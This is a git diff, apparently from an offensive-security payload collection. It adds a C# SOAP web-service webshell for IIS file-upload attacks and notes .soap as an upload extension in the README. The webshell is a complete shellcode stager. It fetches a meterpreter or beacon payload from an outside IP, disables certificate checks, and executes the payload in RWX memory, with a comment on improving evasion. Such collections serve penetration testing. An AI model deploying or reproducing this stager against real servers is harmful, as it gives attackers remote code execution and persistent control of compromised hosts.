diff --git a/Upload Insecure Files/Extension ASP/shell.soap b/Upload Insecure Files/Extension ASP/shell.soap new file mode 100644 index 0000000..dcac007 --- /dev/null +++ b/Upload Insecure Files/Extension ASP/shell.soap @@ -0,0 +1,55 @@ +<%@ WebService Language="C#" class="SoapStager"%> +using System; +using System.IO; +using System.Web; +using System.Web.Services; +using System.Net; +using System.Net.NetworkInformation; +using System.Net.Security; + +// SRC: https://red.0xbad53c.com/red-team-operations/initial-access/webshells/iis-soap +// https://github.com/0xbad53c/webshells/tree/main/iis + +[WebService(Namespace = "http://microsoft.com/" ,Description ="SOAP Stager Webshell" , Name ="SoapStager")] +[WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)] +public class SoapStager : MarshalByRefObject +{ + private static Int32 MEM_COMMIT=0x1000; + private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40; + + [System.Runtime.InteropServices.DllImport("kernel32")] + private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect); + + [System.Runtime.InteropServices.DllImport("kernel32")] + private static extern IntPtr CreateThread(IntPtr lpThreadAttributes,UIntPtr dwStackSize,IntPtr lpStartAddress,IntPtr param,Int32 dwCreationFlags,ref IntPtr lpThreadId); + + + [System.ComponentModel.ToolboxItem(false)] + [WebMethod] + public string loadStage() + { + string Url = "http://10.90.255.52/beacon.bin"; //your IP and location of meterpreter or other raw shellcode + byte[] rzjUFlLZh; + + IWebProxy defaultWebProxy = WebRequest.DefaultWebProxy; + defaultWebProxy.Credentials = CredentialCache.DefaultCredentials; + + // in case of HTTPS + using (WebClient webClient = new WebClient() { Proxy = defaultWebProxy }) + { + ServicePointManager.SecurityProtocol = (SecurityProtocolType)3072; + ServicePointManager.ServerCertificateValidationCallback = new RemoteCertificateValidationCallback(delegate { return true; }); + webClient.UseDefaultCredentials = true; + rzjUFlLZh = webClient.DownloadData(Url); + } + + + // Feel free to improve to PAGE_READWRITE & direct syscalls for more evasion + IntPtr fvYV5t = VirtualAlloc(IntPtr.Zero,(UIntPtr)rzjUFlLZh.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE); + System.Runtime.InteropServices.Marshal.Copy(rzjUFlLZh,0,fvYV5t,rzjUFlLZh.Length); + IntPtr owlqRoQI_ms = IntPtr.Zero; + IntPtr vnspR2 = CreateThread(IntPtr.Zero,UIntPtr.Zero,fvYV5t,IntPtr.Zero,0,ref owlqRoQI_ms); + + return "finished"; + } +} \ No newline at end of file diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md index 0c633a0..0ccaea3 100644 --- a/Upload Insecure Files/README.md +++ b/Upload Insecure Files/README.md @@ -43,7 +43,7 @@ .phtm .inc ``` -* ASP Server : `.asp, .aspx, .cer and .asa (IIS <= 7.5), shell.aspx;1.jpg (IIS < 7.0)` +* ASP Server : `.asp, .aspx, .cer and .asa (IIS <= 7.5), shell.aspx;1.jpg (IIS < 7.0), shell.soap` * JSP : `.jsp, .jspx, .jsw, .jsv, .jspf` * Perl: `.pl, .pm, .cgi, .lib` * Coldfusion: `.cfm, .cfml, .cfc, .dbm` @@ -143,4 +143,5 @@ When a ZIP/archive file is automatically decompressed after the upload * [Encoding Web Shells in PNG IDAT chunks, 04-06-2012, phil](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/) * [La PNG qui se prenait pour du PHP, 23 février 2014](https://phil242.wordpress.com/2014/02/23/la-png-qui-se-prenait-pour-du-php/) * [File Upload restrictions bypass - Haboob Team](https://www.exploit-db.com/docs/english/45074-file-upload-restrictions-bypass.pdf) -* [File Upload - Mahmoud M. Awali / @0xAwali](https://docs.google.com/presentation/d/1-YwXl9rhzSvvqVvE_bMZo2ab-0O5wRNTnzoihB9x6jI/edit#slide=id.ga2ef157b83_1_0) \ No newline at end of file +* [File Upload - Mahmoud M. Awali / @0xAwali](https://docs.google.com/presentation/d/1-YwXl9rhzSvvqVvE_bMZo2ab-0O5wRNTnzoihB9x6jI/edit#slide=id.ga2ef157b83_1_0) +* [IIS - SOAP](https://red.0xbad53c.com/red-team-operations/initial-access/webshells/iis-soap) \ No newline at end of file